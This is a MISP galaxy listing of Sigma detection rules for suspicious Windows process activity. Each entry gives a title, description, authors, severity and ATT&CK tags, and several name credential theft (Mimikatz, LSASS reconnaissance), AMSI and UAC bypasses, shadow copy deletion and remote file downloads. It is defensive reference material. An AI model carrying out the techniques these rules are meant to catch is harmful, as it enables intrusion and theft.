Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

Internal MISP references

UUID 0900463c-b33b-49a8-be1d-552a3b553dae which can be used as unique global reference for Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
creation_date 2023/10/09
falsepositive ['Unlikely']
filename proc_creation_win_susp_hidden_dir_index_allocation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Visual Basic Command Line Compiler Usage

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

Internal MISP references

UUID 7b10f171-7f04-47c7-9fa2-5be43c76e535 which can be used as unique global reference for Visual Basic Command Line Compiler Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/07
falsepositive ['Utilization of this tool should not be seen in enterprise environment']
filename proc_creation_win_lolbin_visual_basic_compiler.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

Potential DLL File Download Via PowerShell Invoke-WebRequest

Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet

Internal MISP references

UUID 0f0450f3-8b47-441e-a31b-15a91dc243e2 which can be used as unique global reference for Potential DLL File Download Via PowerShell Invoke-WebRequest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Hieu Tran
creation_date 2023/03/13
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.t1059.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

File Deletion Via Del

Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

Internal MISP references

UUID 379fa130-190e-4c3f-b7bc-6c8e834485f3 which can be used as unique global reference for File Deletion Via Del in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/15
falsepositive ['False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity']
filename proc_creation_win_cmd_del_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE

Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).

Internal MISP references

UUID 37db85d1-b089-490a-a59a-c7b6f984f480 which can be used as unique global reference for Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/16
falsepositive ['Unknown']
filename proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.

Internal MISP references

UUID 42a5f1e7-9603-4f6d-97ae-3f37d130d794 which can be used as unique global reference for Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

HackTool - Mimikatz Execution

Detection well-known mimikatz command line arguments

Internal MISP references

UUID a642964e-bead-4bed-8910-1bb4d63e3b4d which can be used as unique global reference for HackTool - Mimikatz Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
creation_date 2019/10/22
falsepositive ['Unlikely']
filename proc_creation_win_hktl_mimikatz_command_line.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

HackTool - CoercedPotato Execution

Detects the use of CoercedPotato, a tool for privilege escalation

Internal MISP references

UUID e8d34729-86a4-4140-adfd-0a29c2106307 which can be used as unique global reference for HackTool - CoercedPotato Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/10/11
falsepositive ['Unknown']
filename proc_creation_win_hktl_coercedpotato.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Potential PowerShell Downgrade Attack

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

Internal MISP references

UUID b3512211-c67e-4707-bedc-66efc7848863 which can be used as unique global reference for Potential PowerShell Downgrade Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harish Segar (rule)
creation_date 2020/03/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_downgrade_attack.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Firewall Rule Deleted Via Netsh.EXE

Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

Internal MISP references

UUID 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 which can be used as unique global reference for Firewall Rule Deleted Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/14
falsepositive ['Legitimate administration activity', 'Software installations and removal']
filename proc_creation_win_netsh_fw_delete_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Remote File Download Via Desktopimgdownldr Utility

Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.

Internal MISP references

UUID 214641c2-c579-4ecb-8427-0cf19df6842e which can be used as unique global reference for Remote File Download Via Desktopimgdownldr Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_desktopimgdownldr_remote_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Windows Update Agent Empty Cmdline

Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags

Internal MISP references

UUID 52d097e2-063e-4c9c-8fbb-855c8948d135 which can be used as unique global reference for Suspicious Windows Update Agent Empty Cmdline in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/26
falsepositive ['Unknown']
filename proc_creation_win_wuauclt_no_cli_flags_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Certificate Exported Via PowerShell

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Internal MISP references

UUID 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb which can be used as unique global reference for Certificate Exported Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/18
falsepositive ['Legitimate certificate exports by administrators. Additional filters might be required.']
filename proc_creation_win_powershell_export_certificate.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1552.004', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Set Files as System Files Using Attrib.EXE

Detects the execution of "attrib" with the "+s" flag to mark files as system files

Internal MISP references

UUID bb19e94c-59ae-4c15-8c12-c563d23fe52b which can be used as unique global reference for Set Files as System Files Using Attrib.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/04
falsepositive ['Unknown']
filename proc_creation_win_attrib_system.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Suspicious Service Path Modification

Detects service path modification via the "sc" binary to a suspicious command or path

Internal MISP references

UUID 138d3531-8793-4f50-a2cd-f291b2863d78 which can be used as unique global reference for Suspicious Service Path Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/21
falsepositive ['Unlikely']
filename proc_creation_win_sc_service_path_modification.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Cscript/Wscript Potentially Suspicious Child Process

Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.

Internal MISP references

UUID b6676963-0353-4f88-90f5-36c20d443c6a which can be used as unique global reference for Cscript/Wscript Potentially Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
creation_date 2023/05/15
falsepositive ['Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.']
filename proc_creation_win_wscript_cscript_susp_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Regsvr32 DLL Execution With Suspicious File Extension

Detects the execution of REGSVR32.exe with DLL files masquerading as other files

Internal MISP references

UUID 089fc3d2-71e8-4763-a8a5-c97fbb0a403e which can be used as unique global reference for Regsvr32 DLL Execution With Suspicious File Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), frack113
creation_date 2021/11/29
falsepositive ['Unlikely']
filename proc_creation_win_regsvr32_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Remote CHM File Download/Execution Via HH.EXE

Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.

Internal MISP references

UUID f57c58b3-ee69-4ef5-9041-455bf39aaa89 which can be used as unique global reference for Remote CHM File Download/Execution Via HH.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/29
falsepositive ['Unknown']
filename proc_creation_win_hh_chm_remote_download_or_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.001']
Related clusters

To see the related clusters, click here.

Renamed NirCmd.EXE Execution

Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.

Internal MISP references

UUID 264982dc-dbad-4dce-b707-1e0d3e0f73d9 which can be used as unique global reference for Renamed NirCmd.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2024/03/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_nircmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspicious Extrac32 Alternate Data Stream Execution

Extract data from cab file and hide it in an alternate data stream

Internal MISP references

UUID 4b13db67-0c45-40f1-aba8-66a1a7198a1e which can be used as unique global reference for Suspicious Extrac32 Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extrac32_ads.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Suspicious Windows Trace ETW Session Tamper Via Logman.EXE

Detects the execution of "logman" utility in order to disable or delete Windows trace sessions

Internal MISP references

UUID cd1f961e-0b96-436b-b7c6-38da4583ec00 which can be used as unique global reference for Suspicious Windows Trace ETW Session Tamper Via Logman.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/11
falsepositive ['Legitimate deactivation by administrative staff', 'Installer tools that disable services, e.g. before log collection agent installation']
filename proc_creation_win_logman_disable_eventlog.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1070.001']
Related clusters

To see the related clusters, click here.

Potential Tampering With Security Products Via WMIC

Detects uninstallation or termination of security products using the WMIC utility

Internal MISP references

UUID 847d5ff3-8a31-4737-a970-aeae8fe21765 which can be used as unique global reference for Potential Tampering With Security Products Via WMIC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/01/30
falsepositive ['Legitimate administration']
filename proc_creation_win_wmic_uninstall_security_products.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Audio Capture via PowerShell

Detects audio capture via PowerShell Cmdlet.

Internal MISP references

UUID 932fb0d8-692b-4b0f-a26e-5643a50fe7d6 which can be used as unique global reference for Audio Capture via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/24
falsepositive ['Legitimate audio capture by legitimate user.']
filename proc_creation_win_powershell_audio_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Computer Discovery And Export Via Get-ADComputer Cmdlet

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Internal MISP references

UUID 435e10e4-992a-4281-96f3-38b11106adde which can be used as unique global reference for Computer Discovery And Export Via Get-ADComputer Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/10
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via MSPUB.EXE

Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files

Internal MISP references

UUID 3b3c7f55-f771-4dd6-8a6e-08d057a17caf which can be used as unique global reference for Arbitrary File Download Via MSPUB.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_mspub_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Arbitrary Code Execution Via Node.EXE

Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc

Internal MISP references

UUID 6640f31c-01ad-49b5-beb5-83498a5cd8bd which can be used as unique global reference for Potential Arbitrary Code Execution Via Node.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_node_abuse.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

UAC Bypass Using ChangePK and SLUI

Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

Internal MISP references

UUID 503d581c-7df0-4bbe-b9be-5840c0ecc1fc which can be used as unique global reference for UAC Bypass Using ChangePK and SLUI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_changepk_slui.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Change Default File Association Via Assoc

Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Internal MISP references

UUID 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 which can be used as unique global reference for Change Default File Association Via Assoc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Admin activity']
filename proc_creation_win_cmd_assoc_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Fsutil Behavior Set SymlinkEvaluation

A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt

Internal MISP references

UUID c0b2768a-dd06-4671-8339-b16ca8d1f27f which can be used as unique global reference for Fsutil Behavior Set SymlinkEvaluation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/02
falsepositive ['Legitimate use']
filename proc_creation_win_fsutil_symlinkevaluation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

LSASS Process Reconnaissance Via Findstr.EXE

Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID

Internal MISP references

UUID fe63010f-8823-4864-a96b-a7b4a0f7b929 which can be used as unique global reference for LSASS Process Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_findstr_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Deletion of Volume Shadow Copies via WMI with PowerShell

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Internal MISP references

UUID 21ff4ca9-f13a-41ad-b828-0077b2af2e40 which can be used as unique global reference for Deletion of Volume Shadow Copies via WMI with PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_shadowcopy_deletion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

HackTool - DInjector PowerShell Cradle Execution

Detects the use of the Dinject PowerShell cradle based on the specific flags

Internal MISP references

UUID d78b5d61-187d-44b6-bf02-93486a80de5a which can be used as unique global reference for HackTool - DInjector PowerShell Cradle Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/07
falsepositive ['Unlikely']
filename proc_creation_win_hktl_dinjector.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Hacktool Execution - Imphash

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

Internal MISP references

UUID 24e3e58a-646b-4b50-adef-02ef935b9fc8 which can be used as unique global reference for Hacktool Execution - Imphash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/04
falsepositive ['Legitimate use of one of these tools']
filename proc_creation_win_hktl_execution_via_imphashes.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1588.002', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID 27aec9c9-dbb0-4939-8422-1742242471d0 which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_var.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Child Processes Of SndVol.exe

Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)

Internal MISP references

UUID ba42babc-0666-4393-a4f7-ceaf5a69191e which can be used as unique global reference for Uncommon Child Processes Of SndVol.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unknown']
filename proc_creation_win_sndvol_susp_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Electron Application Child Processes

Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)

Internal MISP references

UUID f26eb764-fd89-464b-85e2-dc4a8e6e77b8 which can be used as unique global reference for Suspicious Electron Application Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/21
falsepositive ['Legitimate child processes can occur in cases of debugging']
filename proc_creation_win_susp_electron_app_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state

Internal MISP references

UUID 236d8e89-ed95-4789-a982-36f4643738ba which can be used as unique global reference for Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/14
falsepositive ['Unknown']
filename proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Powershell Search Order Hijacking - Task

Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader

Internal MISP references

UUID b66474aa-bd92-4333-a16c-298155b120df which can be used as unique global reference for Potential Persistence Via Powershell Search Order Hijacking - Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/04/08
falsepositive ['Unknown']
filename proc_creation_win_schtasks_powershell_persistence.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - PCHunter Execution

Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff

Internal MISP references

UUID fca949cc-79ca-446e-8064-01aa7e52ece5 which can be used as unique global reference for HackTool - PCHunter Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali
creation_date 2022/10/10
falsepositive ['Unlikely']
filename proc_creation_win_hktl_pchunter.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1082', 'attack.t1057', 'attack.t1012', 'attack.t1083', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher

Detects Obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 6c96fc76-0eb1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_stdin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Local Accounts Discovery

Local accounts, System Owner/User discovery using operating systems utilities

Internal MISP references

UUID 502b42de-4306-40b4-9596-6f590c81f073 which can be used as unique global reference for Local Accounts Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate administrator or user enumerates local users for legitimate reason']
filename proc_creation_win_susp_local_system_owner_account_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'attack.t1087.001']
Related clusters

To see the related clusters, click here.

File Download Via Windows Defender MpCmpRun.EXE

Detects the use of Windows Defender MpCmdRun.EXE to download files

Internal MISP references

UUID 46123129-1024-423e-9fae-43af4a0fa9a5 which can be used as unique global reference for File Download Via Windows Defender MpCmpRun.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matthew Matchen
creation_date 2020/09/04
falsepositive ['Unknown']
filename proc_creation_win_mpcmdrun_download_arbitrary_file.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Arbitrary Shell Command Execution Via Settingcontent-Ms

The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

Internal MISP references

UUID 24de4f3b-804c-4165-b442-5a06a2302c7e which can be used as unique global reference for Arbitrary Shell Command Execution Via Settingcontent-Ms in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/03/13
falsepositive ['Unknown']
filename proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1204', 'attack.t1566.001', 'attack.execution', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Potential PowerShell Execution Via DLL

Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.

Internal MISP references

UUID 6812a10b-60ea-420c-832f-dfcc33b646ba which can be used as unique global reference for Potential PowerShell Execution Via DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/08/25
falsepositive ['Unknown']
filename proc_creation_win_susp_powershell_execution_via_dll.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

New Process Created Via Wmic.EXE

Detects new process creation using WMIC via the "process call create" flag

Internal MISP references

UUID 526be59f-a573-4eea-b5f7-f0973207634d which can be used as unique global reference for New Process Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_wmic_process_creation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']
Related clusters

To see the related clusters, click here.

Suspicious IIS URL GlobalRules Rewrite Via AppCmd

Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.

Internal MISP references

UUID 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 which can be used as unique global reference for Suspicious IIS URL GlobalRules Rewrite Via AppCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of appcmd to add new URL rewrite rules']
filename proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential AMSI Bypass Via .NET Reflection

Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning

Internal MISP references

UUID 30edb182-aa75-42c0-b0a9-e998bb29067c which can be used as unique global reference for Potential AMSI Bypass Via .NET Reflection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @Kostastsale
creation_date 2018/08/17
falsepositive ['Unlikely']
filename proc_creation_win_powershell_amsi_init_failed_bypass.yml
level high
logsource.category process_creation
logsource.product windows
